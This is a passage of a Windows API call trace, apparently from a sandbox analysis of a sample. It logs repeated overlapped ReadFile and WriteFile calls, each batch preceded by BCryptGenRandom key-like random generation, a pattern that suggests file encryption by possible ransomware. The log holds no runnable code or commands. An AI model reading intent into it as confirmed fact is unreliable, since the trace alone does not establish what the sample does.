lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0177.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0177.216] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.216] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.216] free (_Block=0x3e305b8) [0177.216] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.216] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.216] free (_Block=0x1fa91d0) [0177.216] free (_Block=0x1fa2ed8) [0177.216] free (_Block=0x1fa90b8) [0177.216] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.217] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.238] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.282] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x19ca, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.305] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x7f4e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0177.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0177.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0177.322] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.322] free (_Block=0x3e305b8) [0177.323] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.323] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.323] free (_Block=0x1fa91d0) [0177.323] free (_Block=0x1fa2ed8) [0177.323] free (_Block=0x1fa90b8) [0177.323] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0177.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.375] CloseHandle (hObject=0x308) returned 1 [0177.375] free (_Block=0x3ef0008) [0177.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.377] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4b80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.524] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.542] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.584] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.596] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.609] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x2094, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0177.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.614] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.614] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0177.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0177.622] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.622] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.622] free (_Block=0x3e305b8) [0177.622] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.622] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.622] free (_Block=0x1fa91d0) [0177.622] free (_Block=0x1fa2ed8) [0177.622] free (_Block=0x1fa90b8) [0177.622] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0177.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.627] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.317] CloseHandle (hObject=0x338) returned 1 [0179.317] free (_Block=0x1ff1e60) [0179.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.328] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.341] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xc68, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0179.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.357] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xf8c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.373] CloseHandle (hObject=0x338) returned 1 [0179.373] free (_Block=0x1ff1e60) [0179.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.374] CloseHandle (hObject=0x2a8) returned 1 [0179.374] free (_Block=0x3df0008) [0179.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.374] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0179.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.400] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1da8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.401] CloseHandle (hObject=0x308) returned 1 [0179.401] free (_Block=0x3f70048) [0179.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.403] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1bc0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.404] CloseHandle (hObject=0x2a4) returned 1 [0179.404] free (_Block=0x3d70450) [0179.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0179.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0179.462] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.463] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.463] free (_Block=0x3e305b8) [0179.463] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.463] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.463] free (_Block=0x1fa91d0) [0179.463] free (_Block=0x1fa2ed8) [0179.463] free (_Block=0x1fa90b8) [0179.463] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.463] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.467] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0179.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0179.485] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.485] free (_Block=0x3e305b8) [0179.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.485] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.486] free (_Block=0x1fa91d0) [0179.486] free (_Block=0x1fa2ed8) [0179.486] free (_Block=0x1fa90b8) [0179.486] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.503] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x236, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0179.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.509] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x66a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0179.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.546] CloseHandle (hObject=0x308) returned 1 [0179.546] free (_Block=0x1ff1e60) [0179.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.553] CloseHandle (hObject=0x2a8) returned 1 [0179.553] free (_Block=0x3d70450) [0179.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.559] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2290, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.559] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0179.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.561] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.562] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.573] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x25bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.573] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0179.574] CloseHandle (hObject=0x2a8) returned 1 [0179.574] free (_Block=0x1ff1e60) [0179.574] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, 